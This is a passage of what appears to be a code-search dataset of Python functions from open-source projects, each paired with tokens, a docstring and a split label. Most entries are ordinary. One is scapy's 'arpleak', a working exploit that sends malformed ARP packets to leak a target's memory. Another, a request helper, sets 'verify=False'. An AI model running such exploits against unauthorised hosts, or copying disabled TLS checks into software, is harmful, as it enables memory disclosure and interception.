https://github.com/jaraco/keyring/blob/71c798378e365286b7cc03c06e4d7d24c7de8fc4/keyring/backends/SecretService.py#L61-L72
def get_password(self, service, username): """Get password of the username for the service """ collection = self.get_preferred_collection() items = collection.search_items( {"username": username, "service": service}) for item in items: if hasattr(item, 'unlock'): item.unlock() if item.is_locked(): # User dismissed the prompt raise KeyringLocked('Failed to unlock the item!') return item.get_secret().decode('utf-8')
[ "def", "get_password", "(", "self", ",", "service", ",", "username", ")", ":", "collection", "=", "self", ".", "get_preferred_collection", "(", ")", "items", "=", "collection", ".", "search_items", "(", "{", "\"username\"", ":", "username", ",", "\"service\"", ":", "service", "}", ")", "for", "item", "in", "items", ":", "if", "hasattr", "(", "item", ",", "'unlock'", ")", ":", "item", ".", "unlock", "(", ")", "if", "item", ".", "is_locked", "(", ")", ":", "# User dismissed the prompt", "raise", "KeyringLocked", "(", "'Failed to unlock the item!'", ")", "return", "item", ".", "get_secret", "(", ")", ".", "decode", "(", "'utf-8'", ")" ]
Get password of the username for the service
[ "Get", "password", "of", "the", "username", "for", "the", "service" ]
python
valid
alecthomas/voluptuous
voluptuous/schema_builder.py
https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L598-L653
def _compile_sequence(self, schema, seq_type): """Validate a sequence type. This is a sequence of valid values or validators tried in order. >>> validator = Schema(['one', 'two', int]) >>> validator(['one']) ['one'] >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'): ... validator([3.5]) >>> validator([1]) [1] """ _compiled = [self._compile(s) for s in schema] seq_type_name = seq_type.__name__ def validate_sequence(path, data): if not isinstance(data, seq_type): raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path) # Empty seq schema, allow any data. if not schema: if data: raise er.MultipleInvalid([ er.ValueInvalid('not a valid value', [value]) for value in data ]) return data out = [] invalid = None errors = [] index_path = UNDEFINED for i, value in enumerate(data): index_path = path + [i] invalid = None for validate in _compiled: try: cval = validate(index_path, value) if cval is not Remove: # do not include Remove values out.append(cval) break except er.Invalid as e: if len(e.path) > len(index_path): raise invalid = e else: errors.append(invalid) if errors: raise er.MultipleInvalid(errors) if _isnamedtuple(data): return type(data)(*out) else: return type(data)(out) return validate_sequence
[ "def", "_compile_sequence", "(", "self", ",", "schema", ",", "seq_type", ")", ":", "_compiled", "=", "[", "self", ".", "_compile", "(", "s", ")", "for", "s", "in", "schema", "]", "seq_type_name", "=", "seq_type", ".", "__name__", "def", "validate_sequence", "(", "path", ",", "data", ")", ":", "if", "not", "isinstance", "(", "data", ",", "seq_type", ")", ":", "raise", "er", ".", "SequenceTypeInvalid", "(", "'expected a %s'", "%", "seq_type_name", ",", "path", ")", "# Empty seq schema, allow any data.", "if", "not", "schema", ":", "if", "data", ":", "raise", "er", ".", "MultipleInvalid", "(", "[", "er", ".", "ValueInvalid", "(", "'not a valid value'", ",", "[", "value", "]", ")", "for", "value", "in", "data", "]", ")", "return", "data", "out", "=", "[", "]", "invalid", "=", "None", "errors", "=", "[", "]", "index_path", "=", "UNDEFINED", "for", "i", ",", "value", "in", "enumerate", "(", "data", ")", ":", "index_path", "=", "path", "+", "[", "i", "]", "invalid", "=", "None", "for", "validate", "in", "_compiled", ":", "try", ":", "cval", "=", "validate", "(", "index_path", ",", "value", ")", "if", "cval", "is", "not", "Remove", ":", "# do not include Remove values", "out", ".", "append", "(", "cval", ")", "break", "except", "er", ".", "Invalid", "as", "e", ":", "if", "len", "(", "e", ".", "path", ")", ">", "len", "(", "index_path", ")", ":", "raise", "invalid", "=", "e", "else", ":", "errors", ".", "append", "(", "invalid", ")", "if", "errors", ":", "raise", "er", ".", "MultipleInvalid", "(", "errors", ")", "if", "_isnamedtuple", "(", "data", ")", ":", "return", "type", "(", "data", ")", "(", "*", "out", ")", "else", ":", "return", "type", "(", "data", ")", "(", "out", ")", "return", "validate_sequence" ]
Validate a sequence type. This is a sequence of valid values or validators tried in order. >>> validator = Schema(['one', 'two', int]) >>> validator(['one']) ['one'] >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'): ... validator([3.5]) >>> validator([1]) [1]
[ "Validate", "a", "sequence", "type", "." ]
python
train
saltstack/salt
salt/utils/virtualbox.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/virtualbox.py#L436-L475
def vb_start_vm(name=None, timeout=10000, **kwargs): ''' Tells Virtualbox to start up a VM. Blocking function! @param name: @type name: str @param timeout: Maximum time in milliseconds to wait or -1 to wait indefinitely @type timeout: int @return untreated dict of started VM ''' # Time tracking start_time = time.time() timeout_in_seconds = timeout / 1000 max_time = start_time + timeout_in_seconds vbox = vb_get_box() machine = vbox.findMachine(name) session = _virtualboxManager.getSessionObject(vbox) log.info('Starting machine %s in state %s', name, vb_machinestate_to_str(machine.state)) try: # Keep trying to start a machine args = (machine, session) progress = wait_for(_start_machine, timeout=timeout_in_seconds, func_args=args) if not progress: progress = machine.launchVMProcess(session, '', '') # We already waited for stuff, don't push it time_left = max_time - time.time() progress.waitForCompletion(time_left * 1000) finally: _virtualboxManager.closeMachineSession(session) # The session state should best be unlocked otherwise subsequent calls might cause problems time_left = max_time - time.time() vb_wait_for_session_state(session, timeout=time_left) log.info('Started machine %s', name) return vb_xpcom_to_attribute_dict(machine, 'IMachine')
[ "def", "vb_start_vm", "(", "name", "=", "None", ",", "timeout", "=", "10000", ",", "*", "*", "kwargs", ")", ":", "# Time tracking", "start_time", "=", "time", ".", "time", "(", ")", "timeout_in_seconds", "=", "timeout", "/", "1000", "max_time", "=", "start_time", "+", "timeout_in_seconds", "vbox", "=", "vb_get_box", "(", ")", "machine", "=", "vbox", ".", "findMachine", "(", "name", ")", "session", "=", "_virtualboxManager", ".", "getSessionObject", "(", "vbox", ")", "log", ".", "info", "(", "'Starting machine %s in state %s'", ",", "name", ",", "vb_machinestate_to_str", "(", "machine", ".", "state", ")", ")", "try", ":", "# Keep trying to start a machine", "args", "=", "(", "machine", ",", "session", ")", "progress", "=", "wait_for", "(", "_start_machine", ",", "timeout", "=", "timeout_in_seconds", ",", "func_args", "=", "args", ")", "if", "not", "progress", ":", "progress", "=", "machine", ".", "launchVMProcess", "(", "session", ",", "''", ",", "''", ")", "# We already waited for stuff, don't push it", "time_left", "=", "max_time", "-", "time", ".", "time", "(", ")", "progress", ".", "waitForCompletion", "(", "time_left", "*", "1000", ")", "finally", ":", "_virtualboxManager", ".", "closeMachineSession", "(", "session", ")", "# The session state should best be unlocked otherwise subsequent calls might cause problems", "time_left", "=", "max_time", "-", "time", ".", "time", "(", ")", "vb_wait_for_session_state", "(", "session", ",", "timeout", "=", "time_left", ")", "log", ".", "info", "(", "'Started machine %s'", ",", "name", ")", "return", "vb_xpcom_to_attribute_dict", "(", "machine", ",", "'IMachine'", ")" ]
Tells Virtualbox to start up a VM. Blocking function! @param name: @type name: str @param timeout: Maximum time in milliseconds to wait or -1 to wait indefinitely @type timeout: int @return untreated dict of started VM
[ "Tells", "Virtualbox", "to", "start", "up", "a", "VM", ".", "Blocking", "function!" ]
python
train
saltstack/salt
salt/states/netsnmp.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/states/netsnmp.py#L133-L141
def _str_elem(config, key): ''' Re-adds the value of a specific key in the dict, only in case of valid str value. ''' _value = config.pop(key, '') if _valid_str(_value): config[key] = _value
[ "def", "_str_elem", "(", "config", ",", "key", ")", ":", "_value", "=", "config", ".", "pop", "(", "key", ",", "''", ")", "if", "_valid_str", "(", "_value", ")", ":", "config", "[", "key", "]", "=", "_value" ]
Re-adds the value of a specific key in the dict, only in case of valid str value.
[ "Re", "-", "adds", "the", "value", "of", "a", "specific", "key", "in", "the", "dict", "only", "in", "case", "of", "valid", "str", "value", "." ]
python
train
CitrineInformatics/python-citrination-client
citrination_client/base/base_client.py
https://github.com/CitrineInformatics/python-citrination-client/blob/409984fc65ce101a620f069263f155303492465c/citrination_client/base/base_client.py#L96-L110
def _post(self, route, data, headers=None, failure_message=None): """ Execute a post request and return the result :param data: :param headers: :return: """ headers = self._get_headers(headers) response_lambda = ( lambda: requests.post( self._get_qualified_route(route), headers=headers, data=data, verify=False, proxies=self.proxies ) ) response = check_for_rate_limiting(response_lambda(), response_lambda) return self._handle_response(response, failure_message)
[ "def", "_post", "(", "self", ",", "route", ",", "data", ",", "headers", "=", "None", ",", "failure_message", "=", "None", ")", ":", "headers", "=", "self", ".", "_get_headers", "(", "headers", ")", "response_lambda", "=", "(", "lambda", ":", "requests", ".", "post", "(", "self", ".", "_get_qualified_route", "(", "route", ")", ",", "headers", "=", "headers", ",", "data", "=", "data", ",", "verify", "=", "False", ",", "proxies", "=", "self", ".", "proxies", ")", ")", "response", "=", "check_for_rate_limiting", "(", "response_lambda", "(", ")", ",", "response_lambda", ")", "return", "self", ".", "_handle_response", "(", "response", ",", "failure_message", ")" ]
Execute a post request and return the result :param data: :param headers: :return:
[ "Execute", "a", "post", "request", "and", "return", "the", "result", ":", "param", "data", ":", ":", "param", "headers", ":", ":", "return", ":" ]
python
valid
bhmm/bhmm
bhmm/estimators/maximum_likelihood.py
https://github.com/bhmm/bhmm/blob/9804d18c2ddb684fb4d90b544cc209617a89ca9a/bhmm/estimators/maximum_likelihood.py#L332-L352
def compute_viterbi_paths(self): """ Computes the viterbi paths using the current HMM model """ # get parameters K = len(self._observations) A = self._hmm.transition_matrix pi = self._hmm.initial_distribution # compute viterbi path for each trajectory paths = np.empty(K, dtype=object) for itraj in range(K): obs = self._observations[itraj] # compute output probability matrix pobs = self._hmm.output_model.p_obs(obs) # hidden path paths[itraj] = hidden.viterbi(A, pobs, pi) # done return paths
[ "def", "compute_viterbi_paths", "(", "self", ")", ":", "# get parameters", "K", "=", "len", "(", "self", ".", "_observations", ")", "A", "=", "self", ".", "_hmm", ".", "transition_matrix", "pi", "=", "self", ".", "_hmm", ".", "initial_distribution", "# compute viterbi path for each trajectory", "paths", "=", "np", ".", "empty", "(", "K", ",", "dtype", "=", "object", ")", "for", "itraj", "in", "range", "(", "K", ")", ":", "obs", "=", "self", ".", "_observations", "[", "itraj", "]", "# compute output probability matrix", "pobs", "=", "self", ".", "_hmm", ".", "output_model", ".", "p_obs", "(", "obs", ")", "# hidden path", "paths", "[", "itraj", "]", "=", "hidden", ".", "viterbi", "(", "A", ",", "pobs", ",", "pi", ")", "# done", "return", "paths" ]
Computes the viterbi paths using the current HMM model
[ "Computes", "the", "viterbi", "paths", "using", "the", "current", "HMM", "model" ]
python
train
seleniumbase/SeleniumBase
seleniumbase/fixtures/base_case.py
https://github.com/seleniumbase/SeleniumBase/blob/62e5b43ee1f90a9ed923841bdd53b1b38358f43a/seleniumbase/fixtures/base_case.py#L906-L965
def create_shepherd_tour(self, name=None, theme=None): """ Creates a Shepherd JS website tour. @Params name - If creating multiple tours at the same time, use this to select the tour you wish to add steps to. theme - Sets the default theme for the tour. Choose from "light"/"arrows", "dark", "default", "square", and "square-dark". ("light" is used if None is selected.) """ shepherd_theme = "shepherd-theme-arrows" if theme: if theme.lower() == "default": shepherd_theme = "shepherd-theme-default" elif theme.lower() == "dark": shepherd_theme = "shepherd-theme-dark" elif theme.lower() == "light": shepherd_theme = "shepherd-theme-arrows" elif theme.lower() == "arrows": shepherd_theme = "shepherd-theme-arrows" elif theme.lower() == "square": shepherd_theme = "shepherd-theme-square" elif theme.lower() == "square-dark": shepherd_theme = "shepherd-theme-square-dark" if not name: name = "default" new_tour = ( """ // Shepherd Tour var tour = new Shepherd.Tour({ defaults: { classes: '%s', scrollTo: true } }); var allButtons = { skip: { text: "Skip", action: tour.cancel, classes: 'shepherd-button-secondary tour-button-left' }, back: { text: "Back", action: tour.back, classes: 'shepherd-button-secondary' }, next: { text: "Next", action: tour.next, classes: 'shepherd-button-primary tour-button-right' }, }; var firstStepButtons = [allButtons.skip, allButtons.next]; var midTourButtons = [allButtons.back, allButtons.next]; """ % shepherd_theme) self._tour_steps[name] = [] self._tour_steps[name].append(new_tour)
[ "def", "create_shepherd_tour", "(", "self", ",", "name", "=", "None", ",", "theme", "=", "None", ")", ":", "shepherd_theme", "=", "\"shepherd-theme-arrows\"", "if", "theme", ":", "if", "theme", ".", "lower", "(", ")", "==", "\"default\"", ":", "shepherd_theme", "=", "\"shepherd-theme-default\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"dark\"", ":", "shepherd_theme", "=", "\"shepherd-theme-dark\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"light\"", ":", "shepherd_theme", "=", "\"shepherd-theme-arrows\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"arrows\"", ":", "shepherd_theme", "=", "\"shepherd-theme-arrows\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"square\"", ":", "shepherd_theme", "=", "\"shepherd-theme-square\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"square-dark\"", ":", "shepherd_theme", "=", "\"shepherd-theme-square-dark\"", "if", "not", "name", ":", "name", "=", "\"default\"", "new_tour", "=", "(", "\"\"\"\n // Shepherd Tour\n var tour = new Shepherd.Tour({\n defaults: {\n classes: '%s',\n scrollTo: true\n }\n });\n var allButtons = {\n skip: {\n text: \"Skip\",\n action: tour.cancel,\n classes: 'shepherd-button-secondary tour-button-left'\n },\n back: {\n text: \"Back\",\n action: tour.back,\n classes: 'shepherd-button-secondary'\n },\n next: {\n text: \"Next\",\n action: tour.next,\n classes: 'shepherd-button-primary tour-button-right'\n },\n };\n var firstStepButtons = [allButtons.skip, allButtons.next];\n var midTourButtons = [allButtons.back, allButtons.next];\n \"\"\"", "%", "shepherd_theme", ")", "self", ".", "_tour_steps", "[", "name", "]", "=", "[", "]", "self", ".", "_tour_steps", "[", "name", "]", ".", "append", "(", "new_tour", ")" ]
Creates a Shepherd JS website tour. @Params name - If creating multiple tours at the same time, use this to select the tour you wish to add steps to. theme - Sets the default theme for the tour. Choose from "light"/"arrows", "dark", "default", "square", and "square-dark". ("light" is used if None is selected.)
[ "Creates", "a", "Shepherd", "JS", "website", "tour", "." ]
python
train
paulovn/sparql-kernel
sparqlkernel/connection.py
https://github.com/paulovn/sparql-kernel/blob/1d2d155ff5da72070cb2a98fae33ea8113fac782/sparqlkernel/connection.py#L181-L190
def lang_match_xml(row, accepted_languages): '''Find if the XML row contains acceptable language data''' if not accepted_languages: return True column_languages = set() for elem in row: lang = elem[0].attrib.get(XML_LANG, None) if lang: column_languages.add(lang) return (not column_languages) or (column_languages & accepted_languages)
[ "def", "lang_match_xml", "(", "row", ",", "accepted_languages", ")", ":", "if", "not", "accepted_languages", ":", "return", "True", "column_languages", "=", "set", "(", ")", "for", "elem", "in", "row", ":", "lang", "=", "elem", "[", "0", "]", ".", "attrib", ".", "get", "(", "XML_LANG", ",", "None", ")", "if", "lang", ":", "column_languages", ".", "add", "(", "lang", ")", "return", "(", "not", "column_languages", ")", "or", "(", "column_languages", "&", "accepted_languages", ")" ]
Find if the XML row contains acceptable language data
[ "Find", "if", "the", "XML", "row", "contains", "acceptable", "language", "data" ]
python
train
secdev/scapy
scapy/layers/l2.py
https://github.com/secdev/scapy/blob/3ffe757c184017dd46464593a8f80f85abc1e79a/scapy/layers/l2.py#L736-L785
def arpleak(target, plen=255, hwlen=255, **kargs): """Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc """ # We want explicit packets pkts_iface = {} for pkt in ARP(pdst=target): # We have to do some of Scapy's work since we mess with # important values iface = conf.route.route(pkt.pdst)[0] psrc = get_if_addr(iface) hwsrc = get_if_hwaddr(iface) pkt.plen = plen pkt.hwlen = hwlen if plen == 4: pkt.psrc = psrc else: pkt.psrc = inet_aton(psrc)[:plen] pkt.pdst = inet_aton(pkt.pdst)[:plen] if hwlen == 6: pkt.hwsrc = hwsrc else: pkt.hwsrc = mac2str(hwsrc)[:hwlen] pkts_iface.setdefault(iface, []).append( Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt ) ans, unans = SndRcvList(), PacketList(name="Unanswered") for iface, pkts in viewitems(pkts_iface): ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) ans += ans_new unans += unans_new ans.listname = "Results" unans.listname = "Unanswered" for _, rcv in ans: if ARP not in rcv: continue rcv = rcv[ARP] psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) if plen > 4 and len(psrc) > 4: print("psrc") hexdump(psrc[4:]) print() hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) if hwlen > 6 and len(hwsrc) > 6: print("hwsrc") hexdump(hwsrc[6:]) print() return ans, unans
[ "def", "arpleak", "(", "target", ",", "plen", "=", "255", ",", "hwlen", "=", "255", ",", "*", "*", "kargs", ")", ":", "# We want explicit packets", "pkts_iface", "=", "{", "}", "for", "pkt", "in", "ARP", "(", "pdst", "=", "target", ")", ":", "# We have to do some of Scapy's work since we mess with", "# important values", "iface", "=", "conf", ".", "route", ".", "route", "(", "pkt", ".", "pdst", ")", "[", "0", "]", "psrc", "=", "get_if_addr", "(", "iface", ")", "hwsrc", "=", "get_if_hwaddr", "(", "iface", ")", "pkt", ".", "plen", "=", "plen", "pkt", ".", "hwlen", "=", "hwlen", "if", "plen", "==", "4", ":", "pkt", ".", "psrc", "=", "psrc", "else", ":", "pkt", ".", "psrc", "=", "inet_aton", "(", "psrc", ")", "[", ":", "plen", "]", "pkt", ".", "pdst", "=", "inet_aton", "(", "pkt", ".", "pdst", ")", "[", ":", "plen", "]", "if", "hwlen", "==", "6", ":", "pkt", ".", "hwsrc", "=", "hwsrc", "else", ":", "pkt", ".", "hwsrc", "=", "mac2str", "(", "hwsrc", ")", "[", ":", "hwlen", "]", "pkts_iface", ".", "setdefault", "(", "iface", ",", "[", "]", ")", ".", "append", "(", "Ether", "(", "src", "=", "hwsrc", ",", "dst", "=", "ETHER_BROADCAST", ")", "/", "pkt", ")", "ans", ",", "unans", "=", "SndRcvList", "(", ")", ",", "PacketList", "(", "name", "=", "\"Unanswered\"", ")", "for", "iface", ",", "pkts", "in", "viewitems", "(", "pkts_iface", ")", ":", "ans_new", ",", "unans_new", "=", "srp", "(", "pkts", ",", "iface", "=", "iface", ",", "filter", "=", "\"arp\"", ",", "*", "*", "kargs", ")", "ans", "+=", "ans_new", "unans", "+=", "unans_new", "ans", ".", "listname", "=", "\"Results\"", "unans", ".", "listname", "=", "\"Unanswered\"", "for", "_", ",", "rcv", "in", "ans", ":", "if", "ARP", "not", "in", "rcv", ":", "continue", "rcv", "=", "rcv", "[", "ARP", "]", "psrc", "=", "rcv", ".", "get_field", "(", "'psrc'", ")", ".", "i2m", "(", "rcv", ",", "rcv", ".", "psrc", ")", "if", "plen", ">", "4", "and", "len", "(", "psrc", ")", ">", "4", ":", "print", "(", "\"psrc\"", ")", "hexdump", "(", "psrc", "[", "4", ":", "]", ")", "print", "(", ")", "hwsrc", "=", "rcv", ".", "get_field", "(", "'hwsrc'", ")", ".", "i2m", "(", "rcv", ",", "rcv", ".", "hwsrc", ")", "if", "hwlen", ">", "6", "and", "len", "(", "hwsrc", ")", ">", "6", ":", "print", "(", "\"hwsrc\"", ")", "hexdump", "(", "hwsrc", "[", "6", ":", "]", ")", "print", "(", ")", "return", "ans", ",", "unans" ]
Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
[ "Exploit", "ARP", "leak", "flaws", "like", "NetBSD", "-", "SA2017", "-", "002", "." ]
python
train
thelabnyc/wagtail_blog
blog/management/commands/wordpress_to_wagtail.py
https://github.com/thelabnyc/wagtail_blog/blob/7e092c02d10ec427c9a2c4b5dcbe910d88c628cf/blog/management/commands/wordpress_to_wagtail.py#L64-L99
def handle(self, *args, **options): """gets data from WordPress site""" # TODO: refactor these with .get if 'username' in options: self.username = options['username'] else: self.username = None if 'password' in options: self.password = options['password'] else: self.password = None self.xml_path = options.get('xml') self.url = options.get('url') try: blog_index = BlogIndexPage.objects.get( title__icontains=options['blog_index']) except BlogIndexPage.DoesNotExist: raise CommandError("Incorrect blog index title - have you created it?") if self.url == "just_testing": with open('test-data.json') as test_json: posts = json.load(test_json) elif self.xml_path: try: import lxml from blog.wp_xml_parser import XML_parser except ImportError as e: print("You must have lxml installed to run xml imports." " Run `pip install lxml`.") raise e self.xml_parser = XML_parser(self.xml_path) posts = self.xml_parser.get_posts_data() else: posts = self.get_posts_data(self.url) self.should_import_comments = options.get('import_comments') self.create_blog_pages(posts, blog_index)
[ "def", "handle", "(", "self", ",", "*", "args", ",", "*", "*", "options", ")", ":", "# TODO: refactor these with .get", "if", "'username'", "in", "options", ":", "self", ".", "username", "=", "options", "[", "'username'", "]", "else", ":", "self", ".", "username", "=", "None", "if", "'password'", "in", "options", ":", "self", ".", "password", "=", "options", "[", "'password'", "]", "else", ":", "self", ".", "password", "=", "None", "self", ".", "xml_path", "=", "options", ".", "get", "(", "'xml'", ")", "self", ".", "url", "=", "options", ".", "get", "(", "'url'", ")", "try", ":", "blog_index", "=", "BlogIndexPage", ".", "objects", ".", "get", "(", "title__icontains", "=", "options", "[", "'blog_index'", "]", ")", "except", "BlogIndexPage", ".", "DoesNotExist", ":", "raise", "CommandError", "(", "\"Incorrect blog index title - have you created it?\"", ")", "if", "self", ".", "url", "==", "\"just_testing\"", ":", "with", "open", "(", "'test-data.json'", ")", "as", "test_json", ":", "posts", "=", "json", ".", "load", "(", "test_json", ")", "elif", "self", ".", "xml_path", ":", "try", ":", "import", "lxml", "from", "blog", ".", "wp_xml_parser", "import", "XML_parser", "except", "ImportError", "as", "e", ":", "print", "(", "\"You must have lxml installed to run xml imports.\"", "\" Run `pip install lxml`.\"", ")", "raise", "e", "self", ".", "xml_parser", "=", "XML_parser", "(", "self", ".", "xml_path", ")", "posts", "=", "self", ".", "xml_parser", ".", "get_posts_data", "(", ")", "else", ":", "posts", "=", "self", ".", "get_posts_data", "(", "self", ".", "url", ")", "self", ".", "should_import_comments", "=", "options", ".", "get", "(", "'import_comments'", ")", "self", ".", "create_blog_pages", "(", "posts", ",", "blog_index", ")" ]
gets data from WordPress site
[ "gets", "data", "from", "WordPress", "site" ]
python
train
pyrogram/pyrogram
pyrogram/client/client.py
https://github.com/pyrogram/pyrogram/blob/e7258a341ba905cfa86264c22040654db732ec1c/pyrogram/client/client.py#L1315-L1386
def resolve_peer(self, peer_id: Union[int, str]): """Use this method to get the InputPeer of a known peer_id. This is a utility method intended to be used **only** when working with Raw Functions (i.e: a Telegram API method you wish to use which is not available yet in the Client class as an easy-to-use method), whenever an InputPeer type is required. Args: peer_id (``int`` | ``str``): The peer id you want to extract the InputPeer from. Can be a direct id (int), a username (str) or a phone number (str). Returns: On success, the resolved peer id is returned in form of an InputPeer object. Raises: :class:`RPCError <pyrogram.RPCError>` in case of a Telegram RPC error. ``KeyError`` in case the peer doesn't exist in the internal database. """ try: return self.peers_by_id[peer_id] except KeyError: if type(peer_id) is str: if peer_id in ("self", "me"): return types.InputPeerSelf() peer_id = re.sub(r"[@+\s]", "", peer_id.lower()) try: int(peer_id) except ValueError: if peer_id not in self.peers_by_username: self.send( functions.contacts.ResolveUsername( username=peer_id ) ) return self.peers_by_username[peer_id] else: try: return self.peers_by_phone[peer_id] except KeyError: raise PeerIdInvalid if peer_id > 0: self.fetch_peers( self.send( functions.users.GetUsers( id=[types.InputUser(user_id=peer_id, access_hash=0)] ) ) ) else: if str(peer_id).startswith("-100"): self.send( functions.channels.GetChannels( id=[types.InputChannel(channel_id=int(str(peer_id)[4:]), access_hash=0)] ) ) else: self.send( functions.messages.GetChats( id=[-peer_id] ) ) try: return self.peers_by_id[peer_id] except KeyError: raise PeerIdInvalid
[ "def", "resolve_peer", "(", "self", ",", "peer_id", ":", "Union", "[", "int", ",", "str", "]", ")", ":", "try", ":", "return", "self", ".", "peers_by_id", "[", "peer_id", "]", "except", "KeyError", ":", "if", "type", "(", "peer_id", ")", "is", "str", ":", "if", "peer_id", "in", "(", "\"self\"", ",", "\"me\"", ")", ":", "return", "types", ".", "InputPeerSelf", "(", ")", "peer_id", "=", "re", ".", "sub", "(", "r\"[@+\\s]\"", ",", "\"\"", ",", "peer_id", ".", "lower", "(", ")", ")", "try", ":", "int", "(", "peer_id", ")", "except", "ValueError", ":", "if", "peer_id", "not", "in", "self", ".", "peers_by_username", ":", "self", ".", "send", "(", "functions", ".", "contacts", ".", "ResolveUsername", "(", "username", "=", "peer_id", ")", ")", "return", "self", ".", "peers_by_username", "[", "peer_id", "]", "else", ":", "try", ":", "return", "self", ".", "peers_by_phone", "[", "peer_id", "]", "except", "KeyError", ":", "raise", "PeerIdInvalid", "if", "peer_id", ">", "0", ":", "self", ".", "fetch_peers", "(", "self", ".", "send", "(", "functions", ".", "users", ".", "GetUsers", "(", "id", "=", "[", "types", ".", "InputUser", "(", "user_id", "=", "peer_id", ",", "access_hash", "=", "0", ")", "]", ")", ")", ")", "else", ":", "if", "str", "(", "peer_id", ")", ".", "startswith", "(", "\"-100\"", ")", ":", "self", ".", "send", "(", "functions", ".", "channels", ".", "GetChannels", "(", "id", "=", "[", "types", ".", "InputChannel", "(", "channel_id", "=", "int", "(", "str", "(", "peer_id", ")", "[", "4", ":", "]", ")", ",", "access_hash", "=", "0", ")", "]", ")", ")", "else", ":", "self", ".", "send", "(", "functions", ".", "messages", ".", "GetChats", "(", "id", "=", "[", "-", "peer_id", "]", ")", ")", "try", ":", "return", "self", ".", "peers_by_id", "[", "peer_id", "]", "except", "KeyError", ":", "raise", "PeerIdInvalid" ]
Use this method to get the InputPeer of a known peer_id. This is a utility method intended to be used **only** when working with Raw Functions (i.e: a Telegram API method you wish to use which is not available yet in the Client class as an easy-to-use method), whenever an InputPeer type is required. Args: peer_id (``int`` | ``str``): The peer id you want to extract the InputPeer from. Can be a direct id (int), a username (str) or a phone number (str). Returns: On success, the resolved peer id is returned in form of an InputPeer object. Raises: :class:`RPCError <pyrogram.RPCError>` in case of a Telegram RPC error. ``KeyError`` in case the peer doesn't exist in the internal database.
[ "Use", "this", "method", "to", "get", "the", "InputPeer", "of", "a", "known", "peer_id", "." ]
python
train
dslackw/slpkg
slpkg/pkg/manager.py
https://github.com/dslackw/slpkg/blob/dd2e08a80e944d337d157b992167ba631a4343de/slpkg/pkg/manager.py#L524-L539
def list_lib(self, repo): """Return package lists """ packages = "" if repo == "sbo": if (os.path.isfile( self.meta.lib_path + "{0}_repo/SLACKBUILDS.TXT".format( repo))): packages = Utils().read_file(self.meta.lib_path + "{0}_repo/" "SLACKBUILDS.TXT".format(repo)) else: if (os.path.isfile( self.meta.lib_path + "{0}_repo/PACKAGES.TXT".format(repo))): packages = Utils().read_file(self.meta.lib_path + "{0}_repo/" "PACKAGES.TXT".format(repo)) return packages
[ "def", "list_lib", "(", "self", ",", "repo", ")", ":", "packages", "=", "\"\"", "if", "repo", "==", "\"sbo\"", ":", "if", "(", "os", ".", "path", ".", "isfile", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/SLACKBUILDS.TXT\"", ".", "format", "(", "repo", ")", ")", ")", ":", "packages", "=", "Utils", "(", ")", ".", "read_file", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/\"", "\"SLACKBUILDS.TXT\"", ".", "format", "(", "repo", ")", ")", "else", ":", "if", "(", "os", ".", "path", ".", "isfile", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/PACKAGES.TXT\"", ".", "format", "(", "repo", ")", ")", ")", ":", "packages", "=", "Utils", "(", ")", ".", "read_file", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/\"", "\"PACKAGES.TXT\"", ".", "format", "(", "repo", ")", ")", "return", "packages" ]
Return package lists
[ "Return", "package", "lists" ]
python
train
ChristopherRabotin/bungiesearch
bungiesearch/__init__.py
https://github.com/ChristopherRabotin/bungiesearch/blob/13768342bc2698b214eb0003c2d113b6e273c30d/bungiesearch/__init__.py#L132-L141
def get_models(cls, index, as_class=False): ''' Returns the list of models defined for this index. :param index: index name. :param as_class: set to True to return the model as a model object instead of as a string. ''' try: return cls._index_to_model[index] if as_class else cls._idx_name_to_mdl_to_mdlidx[index].keys() except KeyError: raise KeyError('Could not find any index named {}. Is this index defined in BUNGIESEARCH["INDICES"]?'.format(index))
[ "def", "get_models", "(", "cls", ",", "index", ",", "as_class", "=", "False", ")", ":", "try", ":", "return", "cls", ".", "_index_to_model", "[", "index", "]", "if", "as_class", "else", "cls", ".", "_idx_name_to_mdl_to_mdlidx", "[", "index", "]", ".", "keys", "(", ")", "except", "KeyError", ":", "raise", "KeyError", "(", "'Could not find any index named {}. Is this index defined in BUNGIESEARCH[\"INDICES\"]?'", ".", "format", "(", "index", ")", ")" ]
Returns the list of models defined for this index. :param index: index name. :param as_class: set to True to return the model as a model object instead of as a string.
[ "Returns", "the", "list", "of", "models", "defined", "for", "this", "index", ".", ":", "param", "index", ":", "index", "name", ".", ":", "param", "as_class", ":", "set", "to", "True", "to", "return", "the", "model", "as", "a", "model", "object", "instead", "of", "as", "a", "string", "." ]
python
train
chrissimpkins/crypto
lib/crypto/library/package.py
https://github.com/chrissimpkins/crypto/blob/6b95fa81b26312e46f02557dca0b5f5c898a76fd/lib/crypto/library/package.py#L28-L32
def remove_tar_files(file_list): """Public function that removes temporary tar archive files in a local directory""" for f in file_list: if file_exists(f) and f.endswith('.tar'): os.remove(f)
[ "def", "remove_tar_files", "(", "file_list", ")", ":", "for", "f", "in", "file_list", ":", "if", "file_exists", "(", "f", ")", "and", "f", ".", "endswith", "(", "'.tar'", ")", ":", "os", ".", "remove", "(", "f", ")" ]
